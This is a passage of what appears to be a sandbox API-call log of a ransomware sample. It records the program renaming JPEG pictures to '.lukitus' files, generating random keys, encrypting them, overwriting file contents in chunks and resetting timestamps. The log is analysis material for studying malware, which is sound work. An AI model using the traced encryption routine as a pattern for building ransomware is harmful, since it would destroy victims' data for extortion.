pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.461] CreateFileW (lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.461] MoveFileExW (lpExistingFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), lpNewFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\F56924BE-9663-41BB-DB3A9C6C-B4A2996D18E4.lukitus" (normalized: "c:\\users\\public\\pictures\\sample pictures\\f56924be-9663-41bb-db3a9c6c-b4a2996d18e4.lukitus"), dwFlags=0x9) returned 1 [0107.462] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.462] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.467] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.501] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.502] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.503] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x4e875, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x4e875, lpOverlapped=0x0) returned 1 [0107.506] SetFilePointer (in: hFile=0x328, lDistanceToMove=524288, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x80000 [0107.506] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x4e875, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x4e875, lpOverlapped=0x0) returned 1 [0107.506] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.507] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6419d470, dwHighDateTime=0x1d31760)) [0107.507] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.507] FlushFileBuffers (hFile=0x328) returned 1 [0107.519] GetFileAttributesExW (in: lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554)) returned 1 [0107.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.519] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.520] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.520] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.520] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.520] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.520] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.520] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.520] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.520] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.520] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.520] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.520] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.520] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.520] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.520] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.520] CreateFileW (lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.520] MoveFileExW (lpExistingFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), lpNewFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\F56924BE-9663-41BB-63F06B4D-40748180C2C9.lukitus" (normalized: "c:\\users\\public\\pictures\\sample pictures\\f56924be-9663-41bb-63f06b4d-40748180c2c9.lukitus"), dwFlags=0x9) returned 1 [0107.522] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.522] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.527] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.557] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.557] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.559] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x11554, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x11554, lpOverlapped=0x0) returned 1 [0107.559] SetFilePointer (in: hFile=0x328, lDistanceToMove=524288, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x80000 [0107.559] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x11554, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x11554, lpOverlapped=0x0) returned 1 [0107.559] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.560] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x642359f0, dwHighDateTime=0x1d31760)) [0107.560] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.560] FlushFileBuffers (hFile=0x328) returned 1 [0107.569] GetFileAttributesExW (in: lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616)) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.569] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.570] CreateFileW (lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.570] MoveFileExW (lpExistingFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), lpNewFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\F56924BE-9663-41BB-2128228C-3EF411E166F1.lukitus" (normalized: "c:\\users\\public\\pictures\\sample pictures\\f56924be-9663-41bb-2128228c-3ef411e166f1.lukitus"), dwFlags=0x9) returned 1 [0107.571] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.571] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.577] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.581] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.581] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.582] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x3d616, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x3d616, lpOverlapped=0x0) returned 1 [0107.602] SetFilePointer (in: hFile=0x328, lDistanceToMove=524288, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x80000 [0107.602] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x3d616, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x3d616, lpOverlapped=0x0) returned 1 [0107.602] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.602] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64281cb0, dwHighDateTime=0x1d31760)) [0107.602] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.603] FlushFileBuffers (hFile=0x328) returned 1 [0107.613] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\bJIMR_DP-n.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\bjimr_dp-n.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66448690, ftCreationTime.dwHighDateTime=0x1d2fcdb, ftLastAccessTime.dwLowDateTime=0x45cd1460, ftLastAccessTime.dwHighDateTime=0x1d301b6, ftLastWriteTime.dwLowDateTime=0x45cd1460, ftLastWriteTime.dwHighDateTime=0x1d301b6, nFileSizeHigh=0x0, nFileSizeLow=0x10b2f)) returned 1 [0107.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.613] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.614] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.614] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.614] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.614] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.614] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.614] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.614] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.614] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.614] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.614] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\bJIMR_DP-n.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\bjimr_dp-n.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.614] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\bJIMR_DP-n.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\bjimr_dp-n.jpg"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\F56924BE-9663-41BB-7D28049F-CA2DC98D9072.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\f56924be-9663-41bb-7d28049f-ca2dc98d9072.lukitus"), dwFlags=0x9) returned 1 [0107.616] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.616] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.620] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x10b2f, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x10b2f, lpOverlapped=0x0) returned 1 [0107.622] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.622] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x10b2f, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x10b2f, lpOverlapped=0x0) returned 1 [0107.622] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.623] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x642cdf70, dwHighDateTime=0x1d31760)) [0107.623] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.623] FlushFileBuffers (hFile=0x328) returned 1 [0107.626] GetFileAttributesExW (in: lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbea1f)) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.626] 